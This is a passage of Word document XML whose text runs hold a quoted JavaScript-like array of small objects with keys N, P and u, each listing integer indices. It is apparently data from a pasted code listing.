        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403789A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 5, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA7CB8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1938561C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C3602" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C0A94C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 8, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B6F6D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7, 8, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E5F85" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218350A1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B8E5C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153494C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FD22F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F2C4A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3172FD35" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368AA81" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 6, 7, 5, 14, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0161DEF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B2B9B7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [125, 151, 159, 239, 264, 292, 311, 317, 332]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8B661E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D95A90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58741762" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B1F8F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 321]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA93149" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD4ACA4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [17, 9, 47, 24, 44, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EFD15D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333FC90F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [16, 20, 50, 89, 106, 124, 128, 159, 170, 179, 195, 223, 226, 227, 245, 311, 317, 329, 337]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311109FC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B8D199" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 8, 13, 10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DDE9B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61BC40" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [52, 80, 84, 162, 198, 340]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7F91DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B57A5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E5418" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D0000" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9, 12, 26]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD5CD53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32D460" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0A3E04" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FA02D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A937E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08092FE1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637E7BD1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0660D9CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [4, 21]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90048E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0BA42F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A68ECA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0D4EB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB506D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D3A31F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1625A745" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8EAEB9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 77]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1D2F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9611F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BDCDE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7094E3AC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF3214" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6560DA31" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9F7B17" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344213C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FD546A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C5D45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B2F617" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0397718D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBF39B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED62CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3C549" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E45C90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFA807" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9DD25D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BE7A4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F125EB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 3, 4, 7, 8]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC847AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5472B6DA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 3, 4, 17, 2, 15, 13],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD9E77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041509D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 306]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3626F89C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101C5669" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4, 5, 6, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2BB68A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A068F0B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [63, 81, 90, 103, 144, 180, 188, 243, 249, 280, 282, 283, 313, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA7AB5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F321FD5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FC236B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E78F13" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [6, 14, 16, 19, 178, 249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65687F27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2DE4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E76EF5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C99009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [40]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A78D87" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ED2905" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094B6868" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF10B1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36442D41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088E8A8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F527143" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CFF779" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D55B885" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [34]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C949ECE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D3289" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8623F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CDF8BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [216]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC02B6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490E5B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C9A95E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54738025" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 7, 10, 11, 14, 23, 40, 200, 219, 249, 277, 282, 283, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E07F52A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42553169" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         g: 6,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59556B60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0520BC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 4, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5A47E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [2, 3, 5, 9]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144213C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBBBC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EEDD3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B968427" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3858B777" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E832E44" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [18, 21, 8, 28],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4992BEF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 7, 8, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB508E3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 9, 39, 48, 55, 61, 95, 98, 99, 105, 116, 118, 120, 126, 137, 185, 194, 196, 201, 237, 248, 271, 281, 301, 346, 350]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522A94E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC6020E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1049C26F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 9, 12, 14, 15, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4CCA6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 7, 8, 10, 11, 13, 20, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1C0293" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9BAE6D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7F4A16" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 8, 9, 10, 11, 12, 13, 14, 15, 16, 19, 20, 21, 22],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4A1A90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [6, 7, 17, 18, 25, 27, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9E7B8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
